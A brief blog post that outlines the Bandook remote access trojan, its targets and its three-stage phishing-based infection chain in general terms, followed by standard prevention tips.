Track Common Adversary Tasks Performed Using Bandook

 






To know more about it, you can go through my detailed document by clicking here






Overview

Bandook, a commercially available RAT that's used by Dark Caracal and also termed as "Operation Manul", was first detected in 2007 and written in Delphi and C++. It generally targets all the sensitive sectors (like government, energy, financial, energy, healthcare, education, and whatnot...) of the countries like USA, South America, Europe, Southeast Asia, etc. 

How Does It Works?

The Bandook malware spreads in three stages- Firstly, a phishing email is generated which is sent via Microsoft Word document containing an embedded code and once it is opened, the malicious virus will get downloaded. After that, a PowerShell payload is encrypted inside the original word document, and lastly, this script downloads as well as executes the final stage of Bandook, i.e. the backdoor.

Prevention

The following measures can help in mitigating these kind of threats:
  • Users should be well-trained as well as aware of the potential threats and ways to handle them.
  • Be wary of the emails from untrusted sources.
  • Don't open links or attachments from the untrusted sources.
  • Regularly update your systems, software, and applications.
  • Always use updated antivirus to avoid malicious infections. 
  • Perform cybersecurity audits and mitigate any weaknesses discovered to prevent any kind of attacks.












To know more about it, you can go through my detailed document by clicking here








































Comments

Popular posts from this blog

Deployment (Part 3)

Deployment (Part 1)

Project Resourcing (Part 2)